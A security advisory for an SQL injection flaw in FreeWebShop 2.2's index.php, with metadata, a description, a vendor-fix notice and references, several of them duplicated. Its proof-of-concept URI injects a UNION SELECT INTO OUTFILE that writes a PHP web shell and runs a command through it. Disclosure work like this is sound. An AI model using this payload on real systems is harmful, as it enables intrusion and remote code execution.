FreeWebShop Index.PHP SQL Injection Vulnerability
BID:20887
Info
FreeWebShop Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 20887 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 02 2006 12:00AM |
| Updated: | Nov 07 2006 05:42PM |
| Credit: | Spiked and anonymous are credited with the discovery of this vulnerability. |
| Vulnerable: |
FreeWebshop FreeWebshop 2.2 |
| Not Vulnerable: |
FreeWebshop FreeWebshop 2.2.2 |
Discussion
FreeWebShop Index.PHP SQL Injection Vulnerability
FreeWebShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
FreeWebShop 2.2 is vulnerable; prior versions may be affected as well.
FreeWebShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
FreeWebShop 2.2 is vulnerable; prior versions may be affected as well.
Exploit / POC
FreeWebShop Index.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
http://www.example.com/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls
An attacker can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
http://www.example.com/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls
Solution / Fix
FreeWebShop Index.PHP SQL Injection Vulnerability
Solution:
The vendor has released an update to address this issue. Please see the references for more information.
Solution:
The vendor has released an update to address this issue. Please see the references for more information.
References
FreeWebShop Index.PHP SQL Injection Vulnerability
References:
References:
- FreeWebShop Changelog Version 2.2.2 (FreeWebShop )
- FreeWebShop Homepage (FreeWebShop)
- FreeWebShop multiple vulnerabilities (Spiked and anonymous)